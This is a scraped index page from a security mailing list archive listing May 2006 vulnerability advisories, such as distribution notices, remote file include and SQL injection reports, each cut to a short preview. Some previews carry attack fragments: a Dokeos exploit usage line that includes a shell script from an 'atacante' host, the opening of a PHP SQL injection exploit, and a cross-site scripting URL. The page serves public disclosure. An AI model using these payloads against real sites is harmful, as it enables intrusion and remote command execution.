|
Colapse all |
Post message
VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices 2006-05-08 VSR Advisories (advisories vsecurity com) [ GLSA 200605-09 ] Mozilla Thunderbird: Multiple vulnerabilities 2006-05-08 Thierry Carrez (koon gentoo org) Secunia Research: Anti-Trojan unacev2.dll Buffer OverflowVulnerability 2006-05-08 Secunia Research (remove-vuln secunia com) Secunia Research: TZipBuilder ZIP File Handling Buffer OverflowVulnerability 2006-05-08 Secunia Research (remove-vuln secunia com) [USN-283-1] MySQL vulnerabilities 2006-05-08 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-283-1 May 08, 2006 mysql-dfsg-4.1, mysql-dfsg vulnerabilities CVE-2006-1516, CVE-2006-1517 =========================================================== A security issue affects the following Ubuntu releases [ more ] [ reply ] [USN-282-1] Nagios vulnerability 2006-05-08 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-282-1 May 08, 2006 nagios vulnerability CVE-2006-2162 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubunt [ more ] [ reply ] [Kurdish Security # 5] phpRaid Remote File Include [SMF] 2006-05-08 botan linuxmail org # Kurdish Security Advisory # phpRaid Remote File Include [SMF] :} # "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email concealed] # Risk : High # Class : Remote # Script : phpRaid # Script [ more ] [ reply ] [Kurdish Security # 4] phpRaid Remote File Include Vulnerability (PHPBB) 2006-05-08 botan linuxmail org # Kurdish Security Advisory # phpRaid Remote File Include [PHPBB] :} # "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email concealed] # Script : phpRaid # Script Website : http://www.spiffyj [ more ] [ reply ] Claroline Open Source e-Learning 1.7.5 Remote File Include 2006-05-08 beford (xbefordx gmail com) ############# # Description ############# # Vendor: http://www.claroline.net # The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable # clarolineRepositorySys in a include() function without being declared. # There are other files vulnerable in the same folder, this exploit only # at [ more ] [ reply ] Multiple Vulnerabilities In IdealBB ASP Bulletin Board 2006-05-08 CodeScan Labs (advisories codescan com) ======================================================================== = CodeScan Advisory, codescan.com <advisories (at) codescan (dot) com [email concealed]> = = Multiple Vulnerabilities In IdealBB ASP Bulletin Board = = Vendor Website: = http://www.idealscience.com = = Affected Version: = Version 1.5.4a And Earlier = [ more ] [ reply ] Dokeos Learning Management System 1.6.4 Remote File Include 2006-05-08 beford (xbefordx gmail com) #!/usr/bin/perl ############ # Dokeos Learning Management System 1.6.4 Remote File Include # Exploit & Advisorie: beford <xbefordx gmail com> # # uso:# perl own.pl <host> <cmd-shell-url> <cmd-var> # perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd # # cmd shell example: <? [ more ] [ reply ] CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability 2006-05-08 Williams, James K (James Williams ca com) Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability CA Vulnerability ID: 34013 CA Advisory Date: 2006-05-02 Discovered By: IBM Global Services Impact: Local attacker can gain escalated privileges. Summary: A potential vulnerability issue exists in our CAIRIM LMP so [ more ] [ reply ] [SECURITY] [DSA 1052-1] New cgiirc packages fix arbitrary code execution 2006-05-08 joey infodrom org (Martin Schulze) AngelineCMS Multiple Vulnerabilities 2006-05-07 admin subjectzero net Summary: --------------------------------------------------- AngelineCMS API (C) 2003-2004 AngelineCMS developers (angelinecms (at) pythonzero (dot) org [email concealed]) AngelineCMS API is a PHP framework which was developed for rapid development of AngelineCMS content management system. AngelineCMS API is OPEN SOUR [ more ] [ reply ] [ GLSA 200605-07 ] Nagios: Buffer overflow 2006-05-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [KAPDA] MyBB1.1.1~Email Verification in User Activation ~SQL Injection Attack 2006-05-07 addmimistrator gmail com ORIGINAL ADVISORY: http://myimei.com/security/2006-05-07/mybb111email-verification-in-user- activation-sql-injection-attack.html ??????-Summary?????- Software: MyBB Sowtware?s Web Site: http://www.mybboard.com Versions: 1.1.1 Class: Remote Status: Unpatched Exploit: Available Solution: A [ more ] [ reply ] OpenEngine (PHP CMS) 2006-05-07 ck caroli info OpenEngine is a PHP based CMS. The parameter "template" is not correctly checked, for this you can include other scripts which will be interpreted. All actual versions are vulnerable (up to 1.8 Beta 2, which is the newest one), only the paths and consequences differ. For example you can bro [ more ] [ reply ] Limbo CMS (option=weblinks) SQL injection exploit 2006-05-07 SnoBMSN Hotmail De <pre> [i] Limbo CMS (option=weblinks) sql injection exploit [i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!} <?php if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id']))) { ?> [*] Usage: <?echo htmlentities($PHP_ [ more ] [ reply ] Re: ISA Server 2004 Log Manipulation 2006-05-06 Shaun Colley (shaun ngssoftware com) Hey, >I'm curious about why you regard this as security-relevant. I do not >know what you mean by "log manipulation". One possible attack vector would be to inject terminal emulator escape sequences into the log file to leverage attacks against vulnerable terminal emulator software. Let's say [ more ] [ reply ] URL Bug On 1ASPHost and DomainDLX Hosting Services 2006-05-05 spymeta yahoo com This is an URL Bug on 1ASPHost & DomainDLX Hosting Services Internet Sites : We Can Run Script, META Tag Or HTML Code. JScript Example (1ASP Host) : http://www.1asphost.com/MainLogin.aspx?error=<script>alert('HACKED%20!') </script> Example (DomainDLX) http://www.domaindlx.com/MainL [ more ] [ reply ] phpBB 2.0.20 Full Path Disclosure and SQL Errors 2006-05-05 cxib securityreason com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.20 Full Path Disclosure and SQL Errors] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 1.5.2006 - -Public: 5.5.2006 from SecurityReason.Com CVE: - - CVE-2006-2219 Full Path Disclosure - - CVE-2006-2220 Sql Errors [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-
Advisory Name: WebSense content filter b
[ more ] [ reply ]